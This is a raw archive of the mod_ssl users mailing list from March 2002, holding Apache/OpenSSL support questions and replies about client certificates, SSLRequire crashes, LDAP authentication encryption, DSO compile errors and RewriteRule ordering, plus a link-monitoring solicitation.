>unauthorized copying, disclosure or distribution of the material in this >e-mail is strictly forbidden. > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > > > > >-- > >Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte >Informationen. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail >irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und >vernichten Sie diese Mail. Das unerlaubte Kopieren sowie die unbefugte >Weitergabe dieser Mail ist nicht gestattet. > >This e-mail may contain confidential and/or privileged information. If you >are not the intended recipient (or have received this e-mail in error) >please notify the sender immediately and destroy this e-mail. Any >unauthorized copying, disclosure or distribution of the material in this >e-mail is strictly forbidden. > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl. _________________________________________________________________ Join the world's largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org -- Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser Mail ist nicht gestattet. This e-mail may contain confidential and/or privileged information. If you are not the intended recipient (or have received this e-mail in error) please notify the sender immediately and destroy this e-mail. Any unauthorized copying, disclosure or distribution of the material in this e-mail is strictly forbidden. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 13 19:45:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10362; Wed, 13 Mar 2002 19:44:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA10330; Wed, 13 Mar 2002 19:43:42 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 759FE4CE69A; Wed, 13 Mar 2002 19:43:41 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2DIBKY71610; Wed, 13 Mar 2002 19:11:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id MAA17104; Wed, 13 Mar 2002 12:01:18 +0100 (MET) Date: Wed, 13 Mar 2002 12:01:18 +0100 (MET) Message-Id: <200203131101.MAA17104@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] mod_ssl-2.8.7-1.3.23.tar.gz and mod_ssl-2.8.6-1.3.23.tar.gz not working properly (PR#673) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Santosh pandey Version: mod_ssl-2.8.7-1.3.23.tar.gz& mod_ssl-2.8.6-1.3.23.tar.gz OS: AIX4.3.3 Submission from: (NULL) (208.132.249.249) Hi, Recently I installed the latest version of mod_ssl aware apache server. Everythings till installation went fine and even I configured the httpd.conf file correctly. I was able to access the secure pages when giving the absolute URL in the address bar but in case of redirection i.e when the url redirect to some other URL I was getting the following error message Proxy Error The proxy server received an invalid response from an upstream server. The proxy server could not handle the request GET /products/corp/apps/gecs/Servlet. Reason: Document contains no data Apache/1.3.23 Server at qwfeeu21 Port 5543 But when I installed just one veriosn older than the lastest version i.e mod_ssl-2.8.5-1.3.22.tar.gz, now everythings working fine. Could you please advise me why the latest version of the mod_ssl behaving like this. Many thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 13 22:35:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA20137; Wed, 13 Mar 2002 22:34:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtpout.telus.net id WAA20099; Wed, 13 Mar 2002 22:33:39 +0100 (MET) Received: from telus.net (sunray2.telus.net [207.194.149.30]) by smtpout.telus.net (8.9.1a/8.9.1) with ESMTP id NAA21853 for ; Wed, 13 Mar 2002 13:33:34 -0800 (PST) Message-ID: <3C8FC57A.1030202@telus.net> Date: Wed, 13 Mar 2002 13:32:42 -0800 From: Suzanne Razenberg Organization: TELUS Consumer Solutions - Multimedia Solutions User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.16-22smp i686; en-US; m18) Gecko/20010110 Netscape6/6.5 X-Accept-Language: en-us, en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Importing client certificate generated under Windows Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Suzanne Razenberg X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I'm trying to get a SSL connection working using a client certificate. I'm running with apache/modssl on Solaris and trying to connect to a partner's IIS web server. I have been sent a client certificate that was generated on the Windows server in a pfx format. In essence, when a user would hit one of our pages, we make a call to a remote server with a client certificate on our web servers, the data from the remote call is parsed, and presented to the user hitting our pages. However, I can't seem to get the IIS server to see the solaris client certificate. I've tried setting different environment variables in my httpd.conf file, such as HTTPS_CERT_FILE, HTTPS_KEY_FILE , and SSL_CLIENT_CERT all pointing to the certificate they sent using an absolute path. Whenever I access the file that is trying to make the remote call, I get the following message in the error logs "Service description 'https://services.theirserver.com/test.wsdl' can't be loaded: 403 Access Forbidden". I've also tried converting the file using openssl pkcs12 to a .pem, but still get the same error. I've seen some messages in the archive about breaking out the certificate into two files, the certificate and the key. Do I need to do this or am I just not loading the client certificate correctly? Thanks in advance, Suzanne ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 05:03:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA10137; Thu, 14 Mar 2002 05:02:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp02.hutchcity.com id FAA10115; Thu, 14 Mar 2002 05:01:36 +0100 (MET) Received: (qmail 52193 invoked from network); 14 Mar 2002 03:54:52 -0000 Received: from unknown (HELO webmaill05) ([202.45.84.76]) (envelope-sender ) by localhost (qmail-ldap-1.03) with SMTP for ; 14 Mar 2002 03:54:52 -0000 Message-ID: <6302596.1016078425966.JavaMail.root@webmaill05> Date: Thu, 14 Mar 2002 12:00:25 +0800 (HKT) From: Angus Lee To: modssl-users@modssl.org Subject: Segmentation fault on incorrect SSLRequire Mime-Version: 1.0 Content-Type: text/plain; charset=Big5 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Angus Lee X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Has anyone faced such problem that mod_ssl will have a segmentation fault when repeated access to a resource which has SSLRequire but that SSLRequire has error. My scenario is that we have a Solaris workstation which has installed Oracle9i Application Server which is Apache + mod_ssl behind. We let the students to create their web pages there and add appropriate SSLRequire line in a .htaccess file so they can use client authentication to access their web pages. However some students produced an error SSLRequire line. When I look back the log file, I found mod_ssl has segmentation fault when repeated access was made. After that, Apache will complain 'SSLRequire syntax error' because mod_ssl was crashed. How can I tackle such problem? Is there any way I can restart Oracle9i Application Server after mod_ssl segmentation fault? I tried to restart the workstation everyday but seems it won't help much. Please help me. Thanks. Angus Lee ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 07:14:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA16685; Thu, 14 Mar 2002 07:13:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gamay.kronodoc.fi id HAA16665; Thu, 14 Mar 2002 07:12:36 +0100 (MET) Received: by gamay.kronodoc.fi (Postfix, from userid 501) id 0CF45BA4D; Thu, 14 Mar 2002 08:12:30 +0200 (EET) Received: from localhost (localhost [127.0.0.1]) by gamay.kronodoc.fi (Postfix) with ESMTP id 082853E37 for ; Thu, 14 Mar 2002 08:12:30 +0200 (EET) Date: Thu, 14 Mar 2002 08:12:29 +0200 (EET) From: Marko Asplund To: modssl-users@modssl.org Subject: CRL distribution Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Marko Asplund X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users what's the best way of distributing certificate revocation lists to clients which are mainly web browsers like Netscape communicator and MS Internet Explorer? -- aspa ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 10:06:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA23654; Thu, 14 Mar 2002 10:05:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from akguard.arkoon.net id KAA23287; Thu, 14 Mar 2002 10:04:12 +0100 (MET) Received: by akguard.arkoon.net id g2E97Yj20155 for ; Thu, 14 Mar 2002 10:07:34 +0100 Received: from Unknown(x.x.x.x); ------------------------------------------------------------------------ Received: from Unknown(x.x.x.x); Message-ID: <021001c1cb38$09c5f560$7064a8c0@arkoon.net> From: "Lionel Gauliardon" To: Subject: authentication Date: Thu, 14 Mar 2002 10:10:08 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_020D_01C1CB40.6B706CC0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Lionel Gauliardon" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users C'est un message de format MIME en plusieurs parties. ------=_NextPart_000_020D_01C1CB40.6B706CC0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello, I currently work with apache 1.3.12, i want authenticate user = (login/password) from server ldap, today (in my config) login and = password are cleartext so i want to "crypt" there. Should I use mod_ssl to do this or mod_auth_ldap (which also support = ssh) ?=20 Thanks for your advice. Regards, Lionel. ------=_NextPart_000_020D_01C1CB40.6B706CC0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello,
 
I currently work with apache 1.3.12, i = want=20 authenticate user (login/password) from server ldap, today (in my = config) login=20 and password are cleartext so i want to "crypt" there.
Should I use mod_ssl to do this or = mod_auth_ldap=20 (which also support ssh) ?
 
Thanks for your advice.
 
Regards, = Lionel.
------=_NextPart_000_020D_01C1CB40.6B706CC0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 11:40:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA28540; Thu, 14 Mar 2002 11:39:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from JUPITER id LAA28523; Thu, 14 Mar 2002 11:38:48 +0100 (MET) Received: from BowralD-MTA by JUPITER with Novell_GroupWise; Thu, 14 Mar 2002 21:38:44 +1100 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Thu, 14 Mar 2002 21:38:28 +1100 From: "Craig Marchant" To: Subject: Compile Errors with mod_ssl as DSO module Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Craig Marchant" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I'm currently trying to upgrade mod_ssl to 2.8.7 using the DSO installation method. I can run the ./configure --with-apxs=/usr/local/apache/bin/apxs --with-ssl=/usr/local/ssl and everything gets configured correctly, however when I try to run make I get the following errors: [root@web1 mod_ssl-2.8.7-1.3.23]# make make[1]: Entering directory `/var/tmp/src/mod_ssl-2.8.7-1.3.23/pkg.sslmod' gcc -c -I/usr/local/apache/include -DLINUX=22 -DMOD_SSL=208106 -DUSE_HSREGEX -DEAPI -fpic -DSHARED_MODULE -I/usr/local/ssl/include -DMOD_SSL_VERSION=\"2.8.7\" mod_ssl.c && mv mod_ssl.o mod_ssl.lo In file included from mod_ssl.c:65: mod_ssl.h:349:18: ndbm.h: No such file or directory make[1]: *** [mod_ssl.lo] Error 1 make[1]: Leaving directory `/var/tmp/src/mod_ssl-2.8.7-1.3.23/pkg.sslmod' make: [all] Error 2 (ignored) I'm currently using Redhat 7.2. If anyone can shed further light on this subjet, it would be most appreciated. Regards, Craig Marchant Systems Administrator Ace Internet Services Pty Ltd Phone: +61 2 48618888 Fax: +61 2 48622985 E-mail: craigm@ace.com.au ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 13:21:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA04371; Thu, 14 Mar 2002 13:20:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail3.cableone.net id NAA04364; Thu, 14 Mar 2002 13:20:03 +0100 (MET) Received: from b2v2l7 ([24.116.137.140]) by mail3.cableone.net with Microsoft SMTPSVC(5.5.1877.687.68); Thu, 14 Mar 2002 05:13:50 -0700 Message-ID: <000901c1cb50$f5e48160$8c897418@b2v2l7> From: "Joe Pearson" To: References: <021001c1cb38$09c5f560$7064a8c0@arkoon.net> Subject: Re: authentication Date: Thu, 14 Mar 2002 05:08:31 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0006_01C1CB16.49088A20" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Pearson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C1CB16.49088A20 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable If you want to encrypt the login and password, you would use SSL. I've = never tried mod_auth_ldap, but I assume it would do nothing about = encrypting the login and password between the browser and the server. = If mod_auth_ldap supports ssh, it is to encrypt the transmission between = Apache and the ldap server. You would only need mod_auth_ldap + SSH if = the LDAP server was connected across an insecure link. Joe Pearson ----- Original Message -----=20 From: Lionel Gauliardon=20 To: modssl-users@modssl.org=20 Sent: Thursday, March 14, 2002 2:10 AM Subject: authentication Hello, I currently work with apache 1.3.12, i want authenticate user = (login/password) from server ldap, today (in my config) login and = password are cleartext so i want to "crypt" there. Should I use mod_ssl to do this or mod_auth_ldap (which also support = ssh) ?=20 Thanks for your advice. Regards, Lionel. ------=_NextPart_000_0006_01C1CB16.49088A20 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
If you want to encrypt the login and password, you = would use=20 SSL.  I've never tried mod_auth_ldap, but I assume it would do = nothing=20 about encrypting the login and password between the browser and the=20 server.   If mod_auth_ldap supports ssh, it is to encrypt the=20 transmission between Apache and the ldap server.  You would only=20 need mod_auth_ldap + SSH if the LDAP server was connected = across an=20 insecure link.
 
Joe Pearson
 
----- Original Message -----
From:=20 Lionel=20 Gauliardon
Sent: Thursday, March 14, 2002 = 2:10=20 AM
Subject: authentication

Hello,
 
I currently work with apache 1.3.12, = i want=20 authenticate user (login/password) from server ldap, today (in my = config)=20 login and password are cleartext so i want to "crypt" = there.
Should I use mod_ssl to do this or = mod_auth_ldap=20 (which also support ssh) ?
 
Thanks for your advice.
 
Regards,=20 Lionel.
------=_NextPart_000_0006_01C1CB16.49088A20-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 14:42:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA08606; Thu, 14 Mar 2002 14:41:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls902a id OAA08573; Thu, 14 Mar 2002 14:40:08 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Thu, 14 Mar 2002 13:39:59 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF9064@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: Rewrite and SSLRequire Date: Thu, 14 Mar 2002 13:40:03 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am trying to force 128 bit encryption and send back a friendly page if the test fails. I have implemented the use of SSLRequire testing the key size. This works fine if you reference an html file. Putting https://localhost/index.html from an export level browser forces a 403 error. I have an ErrorDocument 403 specified. The problem comes with .jsp files. We are using the Oracle OC4J (Orion) Java containers and have a Rewrite rule for .jsp and servlets, i.e: RewriteRule (^/servlet/.*$) http://localhost:8888$1 [P] RewriteRule (^.*jsp.*$) http://localhost:8888$1 [P] RewriteRule (^.*jsp[?\/].*$) http://localhost:8888$1 [P] If you reference https://localhost/index.jsp from a export level Netscape Navigator the 403 error page is displayed. If you do the same from an export level Microsoft IE the .jsp page is displayed without the images. On further investigation I have found that the Rewrite rule is being used before the SSLRequire and therefore sends the request to OC4J. I have tried to put the RewriteRule in the same from exchange00.SC.ESILICON.COM id QAA15205; Thu, 14 Mar 2002 16:53:23 +0100 (MET) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Thu, 14 Mar 2002 07:53:16 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1CB0@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: authentication Date: Thu, 14 Mar 2002 07:53:16 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1CB70.5A9D79D0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1CB70.5A9D79D0 Content-Type: text/plain; charset="iso-8859-1" I use both. Mod_SSL will encrypt the communications to/from the user at the browser Mod_auth_ldap will encrypt the "authentication" communication between itself and the LDAP server. David Marshakk -----Original Message----- From: Joe Pearson [mailto:joe@webdms.com] Sent: Thursday, March 14, 2002 4:09 AM To: modssl-users@modssl.org Subject: Re: authentication If you want to encrypt the login and password, you would use SSL. I've never tried mod_auth_ldap, but I assume it would do nothing about encrypting the login and password between the browser and the server. If mod_auth_ldap supports ssh, it is to encrypt the transmission between Apache and the ldap server. You would only need mod_auth_ldap + SSH if the LDAP server was connected across an insecure link. Joe Pearson ----- Original Message ----- From: Lionel Gauliardon To: modssl-users@modssl.org Sent: Thursday, March 14, 2002 2:10 AM Subject: authentication Hello, I currently work with apache 1.3.12, i want authenticate user (login/password) from server ldap, today (in my config) login and password are cleartext so i want to "crypt" there. Should I use mod_ssl to do this or mod_auth_ldap (which also support ssh) ? Thanks for your advice. Regards, Lionel. ------_=_NextPart_001_01C1CB70.5A9D79D0 Content-Type: text/html; charset="iso-8859-1"
I use both.
 
Mod_SSL will encrypt the communications to/from the user at the browser
 
Mod_auth_ldap will encrypt the "authentication" communication between itself and the LDAP server. 
 
David Marshakk
-----Original Message-----
From: Joe Pearson [mailto:joe@webdms.com]
Sent: Thursday, March 14, 2002 4:09 AM
To: modssl-users@modssl.org
Subject: Re: authentication

If you want to encrypt the login and password, you would use SSL.  I've never tried mod_auth_ldap, but I assume it would do nothing about encrypting the login and password between the browser and the server.   If mod_auth_ldap supports ssh, it is to encrypt the transmission between Apache and the ldap server.  You would only need mod_auth_ldap + SSH if the LDAP server was connected across an insecure link.
 
Joe Pearson
 
----- Original Message -----
Sent: Thursday, March 14, 2002 2:10 AM
Subject: authentication

Hello,
 
I currently work with apache 1.3.12, i want authenticate user (login/password) from server ldap, today (in my config) login and password are cleartext so i want to "crypt" there.
Should I use mod_ssl to do this or mod_auth_ldap (which also support ssh) ?
 
Thanks for your advice.
 
Regards, Lionel.
------_=_NextPart_001_01C1CB70.5A9D79D0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 17:11:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA16459; Thu, 14 Mar 2002 17:10:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from akguard.arkoon.net id RAA16429; Thu, 14 Mar 2002 17:09:40 +0100 (MET) Received: by akguard.arkoon.net id g2EGD0r31245; Thu, 14 Mar 2002 17:13:00 +0100 Received: from Unknown(x.x.x.x); ------------------------------------------------------------------------ Received: from Unknown(x.x.x.x); Message-ID: <035701c1cb73$7430b030$7064a8c0@arkoon.net> From: "Lionel Gauliardon" To: "David Marshall" , References: <79ACB11C0E80FB1AC1256B7C0057AE16.0057AE84C1256B7C@arkoon.net> Subject: Re: authentication Date: Thu, 14 Mar 2002 17:15:27 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Lionel Gauliardon" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Ok, thanks for your help. David what version of apache do you use ? In fact i want only encrypt communication between LDAP server and apache. Lionel. ----- Original Message ----- From: "David Marshall" To: Sent: Thursday, March 14, 2002 4:57 PM Subject: RE: authentication > > > I use both. > > Mod_SSL will encrypt the communications to/from the user at the browser > > Mod_auth_ldap will encrypt the "authentication" communication between > itself > and the LDAP server. > > David Marshakk > > -----Original Message----- > From: Joe Pearson [mailto:joe@webdms.com] > Sent: Thursday, March 14, 2002 4:09 AM > To: modssl-users@modssl.org > Subject: Re: authentication > > > If you want to encrypt the login and password, you would use SSL. I've > never tried mod_auth_ldap, but I assume it would do nothing about > encrypting > the login and password between the browser and the server. If > mod_auth_ldap supports ssh, it is to encrypt the transmission between > Apache > and the ldap server. You would only need mod_auth_ldap + SSH if the LDAP > server was connected across an insecure link. > > Joe Pearson > > ----- Original Message ----- > > From: Lionel Gauliardon > To: modssl-users@modssl.org > Sent: Thursday, March 14, 2002 2:10 AM > Subject: authentication > > Hello, > > I currently work with apache 1.3.12, i want authenticate user > (login/password) from server ldap, today (in my config) login and password > are cleartext so i want to "crypt" there. > Should I use mod_ssl to do this or mod_auth_ldap (which also support ssh) ? > > Thanks for your advice. > > Regards, Lionel. > > > - att1.htm ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 17:31:49 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA17436; Thu, 14 Mar 2002 17:30:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA17313; Thu, 14 Mar 2002 17:29:11 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 8EC3D4CE766; Thu, 14 Mar 2002 17:29:08 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2EGRHj97349; Thu, 14 Mar 2002 17:27:17 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls902a id NAA04691; Thu, 14 Mar 2002 13:26:50 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Thu, 14 Mar 2002 12:26:42 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF905E@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: Rewrite and SSLRequire Date: Thu, 14 Mar 2002 12:26:45 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am trying to force 128 bit encryption and send back a friendly page if the test fails. I have implemented the use of SSLRequire testing the key size. This works fine if you reference an html file. Putting https://localhost/index.html from an export level browser forces a 403 error. I have an ErrorDocument 403 specified. The problem comes with .jsp files. We are using the Oracle OC4J (Orion) Java containers and have a Rewrite rule for .jsp and servlets, i.e: RewriteRule (^/servlet/.*$) http://localhost:8888$1 [P] RewriteRule (^.*jsp.*$) http://localhost:8888$1 [P] RewriteRule (^.*jsp[?\/].*$) http://localhost:8888$1 [P] If you reference https://localhost/index.jsp from a export level Netscape Navigator the 403 error page is displayed. If you do the same from an export level Microsoft IE the .jsp page is displayed without the images. On further investigation I have found that the Rewrite rule is being used before the SSLRequire and therefore sends the request to OC4J. I have tried to put the RewriteRule in the same from visp.engelschall.com id RAA17312; Thu, 14 Mar 2002 17:29:11 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7FD7C4CE764; Thu, 14 Mar 2002 17:29:08 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2EGQsP97343; Thu, 14 Mar 2002 17:26:54 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from internetseer.com id GAA12669; Thu, 14 Mar 2002 06:03:58 +0100 (MET) Received: (qmail 10282 invoked from network); 14 Mar 2002 05:03:34 -0000 Received: from pm58.internetseer.net (HELO pm68) (66.150.40.68) by 66.150.40.21 with SMTP; 14 Mar 2002 05:03:34 -0000 Message-ID: <5383652.1016082232430.JavaMail.promon@pm68> Date: Thu, 14 Mar 2002 00:03:52 -0500 (EST) From: Cindy Jordan To: modssl-users@modssl.org Subject: Broken link on your website Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_13335_4870674.1016082232430" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cindy Jordan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ------=_Part_13335_4870674.1016082232430 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable I noticed that your page: http://www.modssl.org/docs/2.8/ssl_faq.html=20 contained a link to: http://www.certisign.com.br/. On Thu Mar 14, 2002 at 12:03:09 AM EST the page at http://www.certisign.com= .br/ could not be accessed because of the following=20 error: Time Out.=A0 Please note: Unless the broken link points to your website, this is not a p= roblem with your web site. I work for InternetSeer. InternetSeer, a Web site monitoring company, is=20 conducting an ongoing study of web connectivity. As recommended by the=20 Robots Guidelines, this email is being sent to explain our research activit= ies=20 and to let you know about the difficulty in connecting to your site.=20 Your page was last examined on Tue Aug 28, 2001 at 10:56:32 PM EDT. If you= r page has not=20 been updated since Tue Aug 28, 2001 at 10:56:32 PM EDT, this link is most l= ikely currently=20 broken.=20 The error listed above was initially detected by our primary site monitor= =20 in Philadelphia, Pa. then verified by our secondary site monitor located=20 in Los Angeles, Ca. before this error event was recorded. InternetSeer is the largest FREE web site monitoring company in the world. = We provide free web site monitoring to over 1 million users worldwide. We'll= =20 monitor your web site every hour, 7 days a week, 24 hours a day for free. To have InternetSeer monitor your web site for free, click here for instant= signup: http://scclick.internetseer.com/sitecheck/clickthrough.jsp?I5s57e5j5m5f5m5m= 5j53M5pHwwkt0xWS5aUzRPz5tNIVWzC5dIzL52W5sMPTN5n5e5bUKT5bRVzTXxSDI5d6vNN5a6v= P5b53T5p5g=3De3 As part of your free web site monitoring, you'll receive immediate notifica= tions when we encounter problems accessing your web site and weekly performance r= eports. InternetSeer does not store or publish the content of your pages, but rathe= r uses=20 availability and link information for our research. Click here to learn more about InternetSeer.=20 